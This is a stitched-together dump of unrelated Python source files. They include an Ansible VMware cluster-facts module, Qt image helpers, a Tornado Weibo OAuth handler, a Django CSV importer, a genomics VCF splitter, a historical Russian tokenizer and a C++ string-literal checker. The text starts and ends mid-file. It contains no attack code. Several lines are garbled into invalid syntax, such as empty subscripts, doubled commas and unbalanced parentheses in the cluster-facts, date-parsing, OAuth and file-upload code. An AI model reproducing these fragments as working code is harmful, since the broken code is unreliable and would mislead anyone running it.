to find cluster '%s'" % cluster_name) self.cluster_objs = [cluster_obj] def get_all_cluster_objs(self, parent): """ Function to get all cluster managed objects from given parent object Args: parent: Managed objected of datacenter or host folder Returns: List of host managed objects """ cluster_objs = [] if isinstance(parent, vim.Datacenter): folder = parent.hostFolder else: folder = parent for child in folder.childEntity: if isinstance(child, vim.Folder): cluster_objs = cluster_objs + self.get_all_cluster_objs(child) if isinstance(child, vim.ClusterComputeResource): cluster_objs.append(child) return cluster_objs def gather_cluster_facts(self): """ Function to gather facts about cluster """ results = dict(changed=False, clusters=dict()) for cluster in self.cluster_objs: # Default values ha_failover_level = None ha_restart_priority = None ha_vm_tools_monitoring = None ha_vm_min_up_time = None ha_vm_max_failures = None ha_vm_max_failure_window = None ha_vm_failure_interval = None enabled_vsan = False vsan_auto_claim_storage = False # HA das_config = cluster.configurationEx.dasConfig if das_config.admissionControlPolicy: ha_failover_level = das_config.admissionControlPolicy.failoverLevel if das_config.defaultVmSettings: ha_restart_priority = das_config.defaultVmSettings.restartPriority, ha_vm_tools_monitoring = das_config.defaultVmSettings.vmToolsMonitoringSettings.vmMonitoring, ha_vm_min_up_time = das_config.defaultVmSettings.vmToolsMonitoringSettings.minUpTime, ha_vm_max_failures = das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailures, ha_vm_max_failure_window = das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailureWindow, ha_vm_failure_interval = das_config.defaultVmSettings.vmToolsMonitoringSettings.failureInterval, # DRS drs_config = cluster.configurationEx.drsConfig # VSAN if hasattr(cluster.configurationEx, 'vsanConfig'): vsan_config = cluster.configurationEx.vsanConfig enabled_vsan = vsan_config.enabled, vsan_auto_claim_storage = vsan_config.defaultConfig.autoClaimStorage, results['clusters'][] = dict( enable_ha=das_config.enabled, ha_failover_level=ha_failover_level, ha_vm_monitoring=das_config.vmMonitoring, ha_host_monitoring=das_config.hostMonitoring, ha_admission_control_enabled=das_config.admissionControlEnabled, ha_restart_priority=ha_restart_priority, ha_vm_tools_monitoring=ha_vm_tools_monitoring, ha_vm_min_up_time=ha_vm_min_up_time, ha_vm_max_failures=ha_vm_max_failures, ha_vm_max_failure_window=ha_vm_max_failure_window, ha_vm_failure_interval=ha_vm_failure_interval, enabled_drs=drs_config.enabled, drs_enable_vm_behavior_overrides=drs_config.enableVmBehaviorOverrides, drs_default_vm_behavior=drs_config.defaultVmBehavior, drs_vmotion_rate=drs_config.vmotionRate, enabled_vsan=enabled_vsan, vsan_auto_claim_storage=vsan_auto_claim_storage, ) self.module.exit_json(**results) def main(): argument_spec = vmware_argument_spec() argument_spec.update( datacenter=dict(type='str'), cluster_name=dict(type='str') ) module = AnsibleModule( argument_spec=argument_spec, required_one_of=[ ['cluster_name', 'datacenter'], ], ) pyv = VmwreClusterFactsManager(module) pyv.gather_cluster_facts() if __name__ == '__main__': main()
from PySide.QtGui import QImage import numpy as np def qimage_to_numpy(qimage): """ Returns an RGB array given any image. """ # Each row in a bitmap is stored in the size of multiples of 4 # If there are less number of bits in a row, it is padded with 0s # a 32 bit format ensures that we can get away with dealing with padding qimage = qimage.convertToFormat(QImage.Format_ARGB32) w, h = qimage.width(), qimage.height() string = qimage.bits() arr = np.fromstring(bytes(string), dtype=np.uint8) arr = arr.reshape(h, w, 4) arr = arr[..., 0:3] c0 = arr[..., 0].copy() c2 = arr[..., 2].copy() arr[..., 0] = c2 arr[..., 2] = c0 return arr def numpy_to_qimage(array): """ Returns QImage from an RGB array .""" rows, cols, channels = array.shape array4 = np.zeros((rows, cols, 4), dtype=np.uint8) array4[..., 0:3] = array array4[..., 3] = 255 c0 = array[..., 0].copy() c2 = array[..., 2].copy() array4[..., 0] = c2 array4[..., 2] = c0 string = array4.tostring() img = QImage(string, cols, rows, QImage.Format_ARGB32) # On windows, img `img` holds a reference to `string` and behaves wrongly # when the string goes out of scope. return img.copy() def rgb_to_gray(arr): """ Converts an RGB numpy array to grayscale. """ r = arr[:, :, 0].astype(np.float) g = arr[:, :, 1].astype(np.float) b = arr[:, :, 2].astype(np.float) garr = 0.299*r + 0.587*g + 0.114*b return garr.astype(np.uint8) def gray_to_rgb(arr): """ Converts intensity array to RGB. """ return np.dstack([arr, arr, arr]) def rgb_to_yuv(arr): "Converts RGB array to YUV." r = arr[:, :, 0].astype(np.float) g = arr[:, :, 1].astype(np.float) b = arr[:, :, 2].astype(np.float) y = r*.299000 + g*.587000 + b*.114000 u = r*-.168736 + g*-.331264 + b*.500000 + 128 v = r*.500000 + g*-.418688 + b*-.081312 + 128 ret = np.dstack([y, u, v]) ret = np.clip(ret, 0, 255) return ret.astype(np.uint8) def yuv_to_rgb(arr): "Converts YUV array to RGB" y = arr[:, :, 0].astype(np.float) u = arr[:, :, 1].astype(np.float) v = arr[:, :, 2].astype(np.float) r = y + 1.4075 * (v - 128) g = y - 0.3455 * (u - 128) - (0.7169 * (v - 128)) b = y + 1.7790 * (u - 128) ret = np.dstack([r, g, b]) ret = np.clip(ret, 0, 255) return ret.astype(np.uint8) def fft_to_qimage(arr): """Converts frquency spectrum magnitude image to displayable qimage. To make the image visually conceivable, we take the log of the array. Otherwise, there is just too much difference between the maxima and minima. """ magnitutde_log = np.log(1 + arr) # To avoid computing log(0). mn = magnitutde_log.min() mx = magnitutde_log.max() norm_img = 255*(magnitutde_log - mn)/(mx - mn) norm_img = norm_img.astype(np.uint8) rgb_image = gray_to_rgb(norm_img) return numpy_to_qimage(rgb_image)
from newspaper import Article import re def textDownload (H_Link): #gets article portion of the htmltext try: a = Article(H_Link) a.parse() UnicodeArticle = a.text StringArticle = UnicodeArticle.encode('ascii','ignore') StrippedArticle = StringArticle.replace('\n','') return StrippedArticle except Exception as ex: template = "An exception of type {0} occured. Arguments:\n{1!r}" message = template.format(type(ex).__name__, ex.args) print message def countKeyWords (text,keyword): #returns count of given keyword regex = keyword pattern = re.compile(regex,re.IGNORECASE) l = re.findall(pattern,text) return 'There are '+str(len(l))+ ' occurances of \"'+ keyword +'\" in the article.' if __name__ == '__main__': keyword = 'percent' #not case sensitive html_link = '' print countKeyWords(textDownload(html_link),keyword)
import time import random import string import urlparse import urllib import hashlib import tornado.web import tornado.template import tornado.auth import tornado.escape from setting import settings import functools from tornado import httpclient from tornado import escape class WeiboMixin(tornado.auth.OAuth2Mixin): _OAUTH_ACCESS_TOKEN_URL = "" _OAUTH_AUTHORIZE_URL = "" @tornado.web.asynchronous def get_authenticated_user(self, redirect_uri, client_id, client_secret, code, callback, extra_fields=None): http = httpclient.AsyncHTTPClient() fields = set() if extra_fields: fields.update(extra_fields) args = { "redirect_uri": redirect_uri, "code": code, "client_id": client_id, "client_secret": client_secret, "grant_type": "authorization_code" } http.fetch(self._OAUTH_ACCESS_TOKEN_URL, self.async_callback(self._on_access_token, redirect_uri, client_id, client_secret, callback, fields), method="POST", body=urllib.urlencode(args)) @tornado.web.asynchronous def _on_access_token(self, redirect_uri, client_id, client_secret, callback, fields, response): session = escape.json_decode(response.body) callback(session) class WeiboHandler(tornado.web.RequestHandler, WeiboMixin): @tornado.web.asynchronous def get(self): redirect_uri = "%s://%s%s" % (self.request.protocol,, self.request.path) code = self.get_argument("code", None) if code: self.get_authenticated_user(redirect_uri, settings["WeiboAppKey"], settings["WeiboAppSecret"], code, self._on_auth) return self.authorize_redirect(redirect_uri, client_id=settings["WeiboAppKey"], extra_params={"response_type": "code"}) def _on_auth(self, session): self.finish(session) class LogoutHandler(tornado.web.RequestHandler): def get(self): self.redirect_url = self.get_argument("next", "/") self.clear_cookie("user") self.redirect(self.redirect_url)
from .models import LeafData import csv from datetime import datetime import re import os from geoposition import Geoposition from decimal import Decimal from django.core.files import File import matplotlib.pyplot as plt def _get_data_from_filename(filename): datepat = re.compile(r'.+\_(?P<day>\d\d)\_(?P<month>\d\d)\_(?P<year>\d\d\d\d).+') match = datepat.match(filename) return ('day'),'month'),'year')) if match else None def to_decimal(s): try: res = Decimal(s) except: res = Decimal() return res with open('eggs.csv', 'rb') as csvfile: spamreader = csv.reader(csvfile, delimiter=',', quotechar='"') for row in spamreader: ld = LeafData.objects.create() cdate = _get_data_from_filename(row[0]) if cdate: try: ld.collected = datetime(int(cdate[2]), int(cdate[1]), int(cdate[0])) except: pass ld.filename = row[0] ld.species = row[1] ld.where = Geoposition(to_decimal(row[2]), to_decimal(row[3])) srcs = row[4].split(',') if len(srcs) > 1: with open(srcs[0], 'r') as f: fd = File(f)[0]),fd, save=True) with open(srcs[1], 'r') as f: fd = File(f)[1]),fd, save=True) elif len(srcs) == 1 and len(srcs[0]) > 0: with open(srcs[0], 'r') as f: fd = File(f)[0]),fd, save=True) ld.xdata = row[5] ld.ydata = row[6] with open('leafcont%s.png','w+') as inpf: f = plt.figure() ax = f.add_subplot('111') x = map(lambda x: float(x), row[5].split(',')) y = map(lambda x: float(x), row[6].split(',')) ax.plot(x,y) ax.set_aspect('equal') ax.grid('on') f.savefig(inpf, dpi=200) plt.close(plt.gcf())'leafcont%s.png', File(inpf), save=True)
# # Copyright 2017 Vitalii Kulanov # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. def get_fake_comment(patch_set=None, comment_id=None, line=None, message=None, author=None): """Creates a fake comment.""" return { "patch_set": patch_set or 1, "id": comment_id or "TvcXrmjM", "line": line or 23, "message": message or "[nit] trailing whitespace", "updated": "2013-02-26 15:40:43.986000000", "author": author or { "_account_id": 1000096, "name": "John Doe", "email": "" } } def get_fake_comments(comment_count, **kwargs): """Creates a random fake list of comments.""" return [get_fake_comment(**kwargs) for _ in range(comment_count)] def get_fake_comments_in_change(comment_count, path=None, **kwargs): """Creates a random fake list of comments in change.""" return { path or "gerrit-server/fake/path/to/file": get_fake_comments(comment_count, **kwargs) }
"""Bookmarks functionality implementation""" from PyQt5.QtCore import Qt from PyQt5.QtWidgets import QAction from PyQt5.QtGui import QKeySequence, QTextCursor import qutepart class Bookmarks: """Bookmarks functionality implementation, grouped in one class """ def __init__(self, qpart, markArea): self._qpart = qpart self._markArea = markArea qpart.toggleBookmarkAction = self._createAction(qpart, "emblem-favorite", "Toogle bookmark", 'Ctrl+B', self._onToggleBookmark) qpart.prevBookmarkAction = self._createAction(qpart, "go-up", "Previous bookmark", 'Alt+PgUp', self._onPrevBookmark) qpart.nextBookmarkAction = self._createAction(qpart, "go-down", "Next bookmark", 'Alt+PgDown', self._onNextBookmark) markArea.blockClicked.connect(self._toggleBookmark) def _createAction(self, widget, iconFileName, text, shortcut, slot): """Create QAction with given parameters and add to the widget """ icon = qutepart.getIcon(iconFileName) action = QAction(icon, text, widget) action.setShortcut(QKeySequence(shortcut)) action.setShortcutContext(Qt.WidgetShortcut) action.triggered.connect(slot) widget.addAction(action) return action def removeActions(self): self._qpart.removeAction(self._qpart.toggleBookmarkAction) self._qpart.toggleBookmarkAction = None self._qpart.removeAction(self._qpart.prevBookmarkAction) self._qpart.prevBookmarkAction = None self._qpart.removeAction(self._qpart.nextBookmarkAction) self._qpart.nextBookmarkAction = None def clear(self, startBlock, endBlock): """Clear bookmarks on block range including start and end """ for block in qutepart.iterateBlocksFrom(startBlock): self._setBlockMarked(block, False) if block == endBlock: break def isBlockMarked(self, block): """Check if block is bookmarked """ return self._markArea.isBlockMarked(block) def _setBlockMarked(self, block, marked): """Set block bookmarked """ self._markArea.setBlockValue(block, 1 if marked else 0) def _toggleBookmark(self, block): self._markArea.toggleBlockMark(block) self._markArea.update() def _onToggleBookmark(self): """Toogle Bookmark action triggered """ self._toggleBookmark(self._qpart.textCursor().block()) def _onPrevBookmark(self): """Previous Bookmark action triggered. Move cursor """ for block in qutepart.iterateBlocksBackFrom(self._qpart.textCursor().block().previous()): if self.isBlockMarked(block): self._qpart.setTextCursor(QTextCursor(block)) return def _onNextBookmark(self): """Previous Bookmark action triggered. Move cursor """ for block in qutepart.iterateBlocksFrom(self._qpart.textCursor().block().next()): if self.isBlockMarked(block): self._qpart.setTextCursor(QTextCursor(block)) return
import sys class NewickFormatter: def __init__(self, out=sys.stdout, annotations=True, topology_only=False): self.out = out self.annotations = annotations self.topology_only = topology_only def consume(self, stream): first = True for t in stream: if first: first = False feature_names = set() for n in t.traverse(): feature_names |= n.features for standard_feature in ("dist", "name", "support"): feature_names.remove(standard_feature) if self.topology_only: self.out.write(t.write(format=9)) elif self.annotations: self.out.write(t.write(features=feature_names, format_root_node=True)) else: self.out.write(t.write()) self.out.write("\n") class NullSink: def __init__(self, out=sys.stdout): self.out = out def consume(self, stream): for t in stream: pass class StringFormatter: def __init__(self, out=sys.stdout): self.out = out def consume(self, stream): for x in stream: if isinstance(x, str): self.out.write(x) else: try: self.out.write("\n".join((str(element) for element in x))) except TypeError: self.out.write(str(x)) self.out.write("\n") class ListPerLineFormatter: def __init__(self, out=sys.stdout): self.out = out def consume(self, stream): for lst in stream: self.out.write("\n".join(lst))
#!/usr/bin/env python # Copyright (c) 2014 Michael-Keith Bernard # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in # the Software without restriction, including without limitation the rights to # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of # the Software, and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS # FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR # COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER # IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. from graffiti import util __author__ = "Michael-Keith Bernard" def schema(v): if hasattr(v, "_schema"): return v._schema return util.fninfo(v if callable(v) else lambda: v) def dependencies(g): deps = {} for k, v in g.iteritems(): deps[k] = set(v["required"]) return deps def transitive(deps): def deps_for(k): if k not in deps: return [k] trans = set(util.concat1(deps_for(e) for e in deps[k])) return trans | set(deps[k]) return { k: deps_for(k) for k in deps } def topological(deps): if not deps: return [] sources = list(set(deps) - set(util.concat1(deps.values()))) if not sources: raise ValueError("Graph cycle detected!") return (sources + topological(util.select_keys(lambda k, _: k not in sources, deps))) def required_keys(requested, given, deps): required = set(requested) for r in requested: trans = set(deps[r]) prune = set(util.concat1(deps[t] for t in trans if t in given)) required |= trans - prune return required def call_with(schema): def _invoke(env, key): fn, args = schema[key]["fn"], schema[key]["args"] argmap = util.select_keys(lambda k, _: k in args, env) if hasattr(fn, "_schema"): res = fn(_env=argmap, _prune_keys=True) else: res = fn(**argmap) return util.merge(env, { key: res }) return _invoke def compile_graph(g): if not isinstance(g, dict): return g else: canonical = util.map_vals(compile_graph, g) schematized = util.map_vals(schema, canonical) deps = dependencies(schematized) topo = topological(deps)[::-1] topo_trans = { k: [e for e in topo if e in v] for k, v in transitive(deps).iteritems() } required = set(util.concat1(deps.values())) - set(deps) optional = util.merge(*[v["optional"] for v in schematized.values()]) nodes = set(deps) def _graphfn(_env=None, _keys=None, _prune_keys=False, **kwargs): if _env is None: _env = {} _env = util.merge(_env, kwargs) if required - set(_env): raise ValueError("Unmet graph requirements!") if _keys is None: _keys = set(deps) needed = nodes else: _keys = set(_keys) needed = required_keys(_keys, _env, topo_trans) strategy = [e for e in topo if e in needed and e not in _env] result = reduce(call_with(schematized), strategy, _env) if _prune_keys: result = util.select_keys(lambda k, _: k in deps, result) return result _graphfn._schema = { "required": required, "optional": optional, "args": required | set(optional), "fn": _graphfn, "dependencies": transitive(deps), "direct_dependencies": deps, "dependency_ordering": topo_trans, "schema": schematized, "graph": canonical, "ordering": topo, "nodes": nodes, } return _graphfn
"""Functions for parsing the parameter files.""" import os import logging from typing import List, Dict, Union def parse_obslist(fname, path=None): # type: (str, str) -> List[str] """Parse Obslist file containing list of dates/times. Parameters ---------- fname: str Filename of obs_list file. path: str [optional] Path to directory of filename. Returns -------- times: list of strings Observation times in a list. """ if path is not None: fname = os.path.join(path, fname) if not os.path.exists(fname): logging.warning("Obs_list file given does not exist. {}".format(fname)) obstimes = list() with open(fname, 'r') as f: for line in f: if line.startswith("#") or line.isspace() or not line: # Ignores comments and blank/empty lines. continue else: if "#" in line: # Remove comment from end of line line = line.split("#")[0] if "." in line: line = line.split(".")[0] # remove fractions of seconds. obstimes.append(line.strip()) logging.debug("obstimes = {}",format(obstimes)) return obstimes def parse_paramfile(param_file, path=None): # type: (str, str) -> Dict[str, Union[str, float]] """Extract orbit and stellar parameters from parameter file. Parameters ---------- param_file: str Filename of parameter file. path: str [optional] Path to directory of filename. Returns -------- parameters: dict Paramemters as a {param: value} dictionary. """ if path is not None: param_file = os.path.join(path, param_file) parameters = dict() # type: Dict[str, Union[str, float]] if not os.path.exists(param_file): logging.warning("Parameter file given does not exist. {}".format(param_file)) with open(param_file, 'r') as f: for line in f: if line.startswith("#") or line.isspace() or not line: # Ignores comments and blank/empty lines.: pass else: if '#' in line: # Remove comment from end of line line = line.split("#")[0] if line.endswith("="): logging.warning(("Parameter missing value in {}.\nLine = {line}." " Value set to None.").format(param_file, line)) line = line + " None" # Add None value when parameter is missing par, val = line.lower().split('=') par, val = par.strip(), val.strip() if (val.startswith("[") and val.endswith("]")) or ("," in val): # Val is a list parameters[par] = parse_list_string(val) else: try: parameters[par] = float(val) # Turn parameters to floats if possible. except ValueError: parameters[par] = val return parameters def parse_list_string(string): # type: (str) -> List[Union[str, float]] """Parse list of floats out of a string.""" string = string.replace("[", "").replace("]", "").strip() list_str = string.split(",") try: return [float(val) for val in list_str] except ValueError as e: # Can't turn into floats. return [val.strip() for val in list_str]
import csv import pprint def read_hapcut_output(input_hap): with open(input_hap) as f: record_lines = [] for line in f: if not line.startswith('********'): record_lines.append(line) else: yield record_lines record_lines = [] class Phased_snp: def __init__(self, snp): self.snp = snp = (snp[3], snp[4]) def get_phase(self): if int(self.snp[1]) == 0 and int(self.snp[2]) == 1: return 0 elif int(self.snp[2]) == 0 and int(self.snp[1]) == 1: return 1 else: raise AssertionError('Error with phasing, row:', self.snp) def phased_snps(input_hap): phased_dict = {} for record in read_hapcut_output(input_hap): snps = csv.reader(record[1:], delimiter='\t') for snp in snps: phased_snp = Phased_snp(snp) phased_dict[] = phased_snp return phased_dict def make_phased_vcfs(input_vcf, input_hap): assert input_vcf[-4:] == '.vcf' out_orig = input_vcf[:-4] + '__orig__.vcf' out_new = input_vcf[:-4] + '__new__.vcf' with open(input_vcf, newline='') as i_vcf: fields = ('CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT', 'SAMPLE') vcf_reader = csv.DictReader(i_vcf, delimiter='\t', fieldnames=fields) with open(out_orig, 'w', newline='') as o_orig, open(out_new, 'w', newline='') as o_new: orig_writer = csv.DictWriter(o_orig, fields, delimiter='\t', lineterminator='\n') new_writer = csv.DictWriter(o_new, fields, delimiter='\t', lineterminator='\n') phased_dict = phased_snps(input_hap) phase_count = 0 for row in vcf_reader: # print(row) row_id = (row['CHROM'], row['POS']) # print(row_id) format_list = row['FORMAT'].split(':') sample_list = row['SAMPLE'].split(':') sample_dict = dict(zip(format_list, sample_list)) sample_dict['RD'], sample_dict['AD'] = int(sample_dict['RD']), int(sample_dict['AD']) # If the SNP is homozygous alternate (i.e. there are only alternate reads), # Add the SNP to both vcfs if sample_dict['AD'] > 0 and sample_dict['RD'] == 0: orig_writer.writerow(row) new_writer.writerow(row) # If the SNP is heterozygous and not phased, # Add the SNP to the new vcf elif (sample_dict['AD'] > 0 and sample_dict['RD'] > 0 and row_id not in phased_dict): new_writer.writerow(row) # If the SNP is heterozygous and phased, # Add the SNP to orig_vcf if it is phased as 0, add to new_vcf if phased as 1 elif (sample_dict['AD'] > 0 and sample_dict['RD'] > 0 and row_id in phased_dict): phase_count += 1 if phased_dict[row_id].get_phase() == 0: orig_writer.writerow(row) elif phased_dict[row_id].get_phase() == 1: new_writer.writerow(row) print('Number of SNPs from vcf that were phased:', phase_count) make_phased_vcfs('/path/to/16_A12_pUn_down_freeze2.vcf', '/path/to/output_haplotype_file')
# -*- coding: utf-8 -*- __author__ = 'ElenaSidorova' import re SYMBOLS = { 'symbols': [u'[', u']', u'-', u"'"], 'numbers': [u'0', u'1', u'2', u'3', u'4', u'5', u'6', u'7', u'8', u'9'], 'brackets': [u'[', u']'] } class WordTokenizer(object): @classmethod def tokenize(cls, text): tokens = [] for litera in text: if not tokens: tokens.append(litera) continue if litera.isalpha(): if tokens[-1][-1].isalpha(): tokens[-1] += litera elif tokens[-1][-1] in SYMBOLS['symbols']: tokens[-1] += litera else: tokens.append(litera) continue if litera in SYMBOLS['symbols']: if tokens[-1][-1].isalpha(): tokens[-1] += litera elif tokens[-1][-1] in SYMBOLS['symbols']: if litera == u'[' and tokens[-1][-1] in SYMBOLS['brackets']: tokens.append(litera) continue if litera == u']' and tokens[-1][-1] in SYMBOLS['brackets']: tokens.append(litera) continue tokens[-1] += litera else: tokens.append(litera) continue if litera in SYMBOLS['numbers']: if tokens[-1][-1] in SYMBOLS['numbers']: tokens[-1] += litera else: tokens.append(litera) continue tokens.append(litera) refactored = [] for token in tokens: if u']' not in token and u'[' not in token: refactored.append(token) else: new = cls.check_token(token) if isinstance(new, unicode): refactored.append(token) else: refactored += new refactored = cls.group_brackets(refactored) return refactored @classmethod def group_brackets(cls, tokens): edited = [] pos = 0 for i, token in enumerate(tokens): if pos >= len(tokens): break if tokens[pos] == u'[': test_tokens = tokens[pos+1:] if len(test_tokens) == 0: edited.append(tokens[pos]) pos += 1 continue ok_symb = 0 joined = None arr = [] closed = 0 n = 0 for j, st in enumerate(test_tokens): if ok_symb > 1: break if not st[0].isalpha() and st[0] not in SYMBOLS['symbols']: if ok_symb > 1: if closed and arr: arr = arr[:-1] if arr: joined = 1 break if'^\s$', st): if closed and arr: joined = 1 break else: if not ok_symb: ok_symb += 1 arr.append(st) else: if closed and arr: joined = 1 break elif st == u']': if closed: if arr: joined = 1 break closed = 1 arr.append(st) elif st == u'[': if closed and arr: joined = 1 break else: arr.append(st) n += 1 if joined and arr: token = token + u''.join(arr) if not pos: edited.append(token) if joined and arr: pos += n pos += 1 continue if joined and arr: if tokens[pos-1][-1].isalpha() or tokens[pos-1][-1] in SYMBOLS['symbols']: edited[-1] += token pos += n pos += 1 continue else: edited.append(token) pos += 1 else: edited.append(tokens[pos]) pos += 1 return edited @classmethod def check_token(cls, token): if u'[' in token and u']' not in token: token = cls.split_token(token) elif u']' in token and u'[' not in token: token = cls.split_token(token) elif cls.check_order_and_amount(token) is None: token = cls.split_token(token) return token @classmethod def check_order_and_amount(cls, token): left = [] right = [] for i, litera in enumerate(token): if litera == u'[': left.append(i) if litera == u']': right.append(i) if len(left) != len(right): return None for i, el in enumerate(left): if el > right[i]: return None if el + 1 == right[i]: return None return 1 @classmethod def split_token(cls, token): arr = [] single = [] for i, litera in enumerate(token): if litera in SYMBOLS['brackets']: single.append(i) arr.append(litera) continue if i-1 >= 0 and i-1 not in single: if not arr: arr.append(litera) else: arr[-1] += litera else: arr.append(litera) return arr # a = WordTokenizer() # b = a.tokenize(u'''...те\nст... токенизатора.''') # b = a.tokenize(u'обычно[мъ] своемъ мѣстѣ, подлѣ барометра, разставивъ ноги на приличное раз[стояніе], заложивъ руки назадъ и приводя за спиною пальцы въ движеніе тѣмъ быстрѣе, чѣмъ болѣе горячился [13] папа, спереди не выказывалъ ни малѣйшаго знака безпокойства, но, напротивъ, выраженіемъ лица выказывалъ совершенное сознаніе своей правоты и вмѣстѣ съ тѣмъ подвластности.') # b = a.tokenize(u'«скоб[к»и]»') # b = u"который [на] обычно[мъ] [своемъ] мѣстѣ, под[лѣ] баро[метра], разст[авивъ], любо[въ] 123 д'артань-ян" # b = u'qwe[re]fs jk[]jk' # b = u'«скоб[к»и]po» [скобки]' # b = a.tokenize(b) # print u'\n'.join(b) # print u'\n'.join(a.get_tokens(b))
#!/usr/bin/env python ''' MSER detector demo ================== [<video source>] ESC - exit Maximally stable extremal region extractor forked from python2/ ''' import os,sys sys.path.append(r'D:\workspaces\aptana3\openvc_demo\python2') sys.path.append(r'D:\data\aptana34workspace\computer_cv\python2') import numpy as np import cv2 import video def official_method(): try: video_src = sys.argv[1] except: video_src = 0 cam = video.create_capture(video_src) mser = cv2.MSER() while True: #ret, img = img = cv2.imread('img/eng_text.png') gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) vis = img.copy() regions = mser.detect(gray, None) hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions] cv2.polylines(vis, hulls, 1, (0, 255, 0)) cv2.imshow('img', vis) if 0xFF & cv2.waitKey(5) == 27: break cv2.destroyAllWindows() if __name__ == '__main__': mser = cv2.MSER() #ret, img = #img = cv2.imread('img/eng_text.png') img = cv2.imread(r'F:\Recovery\bigchi.png') gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) vis = img.copy() regions = mser.detect(gray, None) print 'type regions : ',type(regions[0]) hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions] cv2.polylines(vis, hulls, 1, (0, 255, 0)) cv2.imshow('img', vis) cv2.waitKey(0) cv2.destroyAllWindows()
## ## Copyright(c) 2009 Syntext, Inc. All Rights Reserved. ## Contact:, ## ## This file is part of Syntext Serna XML Editor. ## ## COMMERCIAL USAGE ## Licensees holding valid Syntext Serna commercial licenses may use this file ## in accordance with the Syntext Serna Commercial License Agreement provided ## with the software, or, alternatively, in accorance with the terms contained ## in a written agreement between you and Syntext, Inc. ## ## GNU GENERAL PUBLIC LICENSE USAGE ## Alternatively, this file may be used under the terms of the GNU General ## Public License versions 2.0 or 3.0 as published by the Free Software ## Foundation and appearing in the file LICENSE.GPL included in the packaging ## of this file. In addition, as a special exception, Syntext, Inc. gives you ## certain additional rights, which are described in the Syntext, Inc. GPL ## Exception for Syntext Serna Free Edition, included in the file ## GPL_EXCEPTION.txt in this package. ## ## You should have received a copy of appropriate licenses along with this ## package. If not, see <>. If you are unsure ## which license is appropriate for your use, please contact the sales ## department at ## ## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE ## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. ## #!/usr/bin/python import sys, os, re, datetime src_re = re.compile(r"^.*\.((cxx)|(h))$", re.I) skip_re = re.compile(r"^\s*((#\s*include\s+)|(//)).*$") start_skip = re.compile(r"^\s*//\s*START_IGNORE_LITERALS.*$") stop_skip = re.compile(r"^\s*//\s*STOP_IGNORE_LITERALS.*$") complete_line_re = re.compile(r'^.*([\;\}\{])\s*$') literal_re = re.compile(r'(?P<literal>(?<!\\)".*?(?<!\\)")+') allowed = [ r"tr", r"QT_TR(ANSLATE)?_NOOP", r"NOTR", r"get(Safe)?Property", r"makeDescendant", r"RT_MSG_ASSERT", r"REGISTER_COMMAND_EVENT_MAKER", r"GD", r"DYNCALL\d*", r"(Q|get)Color", r"QRegExp", r"translate", r"get_translated", r"inherits" ] allowed_re = re.compile(r"^(" + '|'.join(allowed) + ")$") macro_begin = re.compile(r"^(.*\W)?(?P<name>\w+)\s*\($") def dump(lines, line): if 0 < len(lines): return ''.join(lines) else: return line def linestrip(line): # line = re.sub(r'"\s*"', '', line) line = re.sub(r'\\.', '', line) line = re.sub(r"'\"'", '', line) return line def eligible(line): line = line.strip('" \t\n') if re.match(r"^[\.\s\d]*$", line): return False if re.match(r"^\W*$", line): return False if re.match(r"^.$", line): return False return True ddbg_re = re.compile(r"^.*((IMDBG)|(DDBG)|((std::)?c(err|out)))\s*<<\s*") dbg_re = re.compile(r"^.*DBG\s*\(.+?\)\s*<<\s*") dbgexec_re = re.compile(r"^.*DBG_EXEC.*$") dbgif_re = re.compile(r"^.*DBG_IF.*(\)\s*{)?.*$") def is_debug(line): d_obj = ddbg_re.match(line) if d_obj: return True d_obj = dbg_re.match(line) if d_obj: return True d_obj = dbgif_re.match(line) if d_obj: return True d_obj = dbgexec_re.match(line) if d_obj: return True return False def find_allowed_wrapper(line, start, end): if is_debug(line[:start]): return "DBG" lhp = line.rfind('(', 0, start) rhp = line.find(')', end) + 1 if 0 < lhp and 0 < rhp: m_obj = macro_begin.match(line, 0, lhp + 1) if m_obj: wrapper ="name") if allowed_re.match(wrapper): return wrapper return find_allowed_wrapper(line, lhp, rhp) return "" def do_check(source): lines = [] lineno = 0 dbg_flag = '' skip_flag = 0 comment_flag = 0 mismatches = [] for line in iter(open(source)): lineno += 1 line = line.strip(" \t") start_comment = line.find("/*") end_comment = line.rfind("*/") if -1 != start_comment: if end_comment < start_comment: comment_flag = lineno else: line = line[:start_comment] + ' '*(end_comment-start_comment) + line[end_comment:] if -1 != end_comment: comment_flag = 0 if comment_flag: continue if stop_skip.match(line): if not skip_flag: print >> sys.stderr, "STOP_IGNORE_LITERALS encountered at "\ "line %d when not skipping" % lineno skip_flag = 0 continue if start_skip.match(line): if skip_flag: print >> sys.stderr, "START_IGNORE_LITERALS encountered "\ "twice at lines %d and %d", skip_flag, lineno skip_flag = lineno continue if skip_flag or skip_re.match(line): continue line = re.sub(r"\s*//+.*$", "", line) complete_line_obj = complete_line_re.match(line) if not complete_line_obj: lines.append(line) continue elif 0 < 